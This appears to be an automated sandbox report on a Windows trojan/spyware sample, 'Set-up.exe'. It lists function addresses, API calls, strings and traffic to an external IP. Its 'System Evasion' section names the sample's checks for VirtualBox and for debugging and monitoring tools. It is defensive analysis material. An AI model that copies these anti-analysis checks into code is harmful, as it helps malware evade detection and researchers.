Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009EAFC00_2_009EAFC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00928F200_2_00928F20
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00824F700_2_00824F70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A030200_2_00A03020
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B5F0100_2_00B5F010
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009DF0400_2_009DF040
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009D11900_2_009D1190
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009DD1D00_2_009DD1D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009F11000_2_009F1100
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009211400_2_00921140
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0089B2D00_2_0089B2D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0098D2300_2_0098D230
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B7B3800_2_00B7B380
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AA33F00_2_00AA33F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009EB3F00_2_009EB3F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009873100_2_00987310
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B774A00_2_00B774A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009DB4B00_2_009DB4B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B6D4300_2_00B6D430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B6F4300_2_00B6F430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009234500_2_00923450
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B735B00_2_00B735B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009EF5B00_2_009EF5B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0086F5B00_2_0086F5B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080D5C00_2_0080D5C0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B655E00_2_00B655E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B535C00_2_00B535C0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B396B00_2_00B396B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AA36A00_2_00AA36A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B7B6F00_2_00B7B6F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B556D00_2_00B556D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B696500_2_00B69650
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009897900_2_00989790
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B917A00_2_00B917A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B757800_2_00B75780
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009F97D00_2_009F97D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B637E00_2_00B637E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008A77E00_2_008A77E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B777300_2_00B77730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B4B7200_2_00B4B720
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0087D7400_2_0087D740
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008B98800_2_008B9880
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B6D8900_2_00B6D890
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B7D8E00_2_00B7D8E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0098F8500_2_0098F850
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008AB8400_2_008AB840
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B6B9900_2_00B6B990
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009DD9E00_2_009DD9E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B599200_2_00B59920
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0096B9000_2_0096B900
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00AC39600_2_00AC3960
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009C9A100_2_009C9A10
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A1FA100_2_00A1FA10
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B83A700_2_00B83A70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009A9A500_2_009A9A50
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B5DB800_2_00B5DB80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00841BE00_2_00841BE0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B71BD00_2_00B71BD0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B7BB100_2_00B7BB10
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008DBB500_2_008DBB50
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B51B500_2_00B51B50
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B4DCB00_2_00B4DCB0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00987CA00_2_00987CA0
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 009DA170 appears 58 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 009DCBC0 appears 487 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 009DC9B0 appears 96 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0080CAA0 appears 37 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00844F40 appears 139 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00844FD0 appears 119 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 009B7310 appears 44 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 008073F0 appears 59 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 008450A0 appears 32 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 009B7120 appears 45 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 009DE710 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 009B7220 appears 761 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 009DCA40 appears 94 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00919720 appears 39 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00B88B80 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 008E44A0 appears 43 times
Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 008075A0 appears 345 times
Source: Set-up.exeStatic PE information: invalid certificate
Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exeBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
Source: classification engineClassification label: mal60.troj.spyw.evad.winEXE@1/0@9/2
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0081D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,0_2_0081D090
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0080255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008029FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_008029FF
Source: C:\Users\user\Desktop\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Set-up.exeString found in binary or memory: set-addPolicy
Source: Set-up.exeString found in binary or memory: in-addr.arpa
Source: Set-up.exeString found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
Source: Set-up.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
Source: Set-up.exeString found in binary or memory: in-addr.arpa
Source: Set-up.exeString found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
Source: Set-up.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exeString found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
Source: Set-up.exeString found in binary or memory: id-cmc-addExtensions
Source: Set-up.exeString found in binary or memory: set-addPolicy
Source: Set-up.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exeStatic file information: File size 6759048 > 1048576
Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x499800
Source: Set-up.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x151c00
Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B98D8A LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,0_2_00B98D8A
Source: Set-up.exeStatic PE information: section name: .eh_fram
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0125CB28 push esp; retf 0_3_0125CB29
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0125CB28 push esp; retf 0_3_0125CB29
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_0126E8E8 push eax; ret 0_3_0126E8E9
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B841D0 push eax; mov dword ptr [esp], edx0_2_00B841D5
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00A20300 push eax; mov dword ptr [esp], 00000000h0_2_00A20305
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0087C6D0 push eax; mov dword ptr [esp], edx0_2_0087C6D5
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008A8640 push eax; mov dword ptr [esp], edx0_2_008A8645

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Set-up.exeCode function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second 0_2_008029FF
Source: Set-up.exeBinary or memory string: PROCMON.EXE
Source: Set-up.exeBinary or memory string: X64DBG.EXE
Source: Set-up.exeBinary or memory string: WINDBG.EXE
Source: Set-up.exeBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Set-up.exeBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009E9980 rdtsc 0_2_009E9980
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008029FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_008029FF
Source: C:\Users\user\Desktop\Set-up.exeAPI coverage: 7.4 %
Source: C:\Users\user\Desktop\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0080255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008029FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_008029FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009DE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_009DE270
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0080255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0080255D
Source: Set-up.exeBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Set-up.exe, 00000000.00000003.1679111250.0000000001027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Set-up.exeBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000000.00000002.1771730031.000000000344E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1769862213.00000000033D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2 },
Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009E9980 rdtsc 0_2_009E9980
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008029FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_008029FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00B98D8A LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,0_2_00B98D8A
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,0_2_0080116C
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008011A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_008011A3
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00801160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,0_2_00801160
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008013C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,0_2_008013C9
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009E93D0 GetSystemTime,SystemTimeToFileTime,0_2_009E93D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C90730 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_00C90730
Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Set-up.exe, Set-up.exe, 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: Set-up.exe, Set-up.exe, 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 194.87.58.155:80
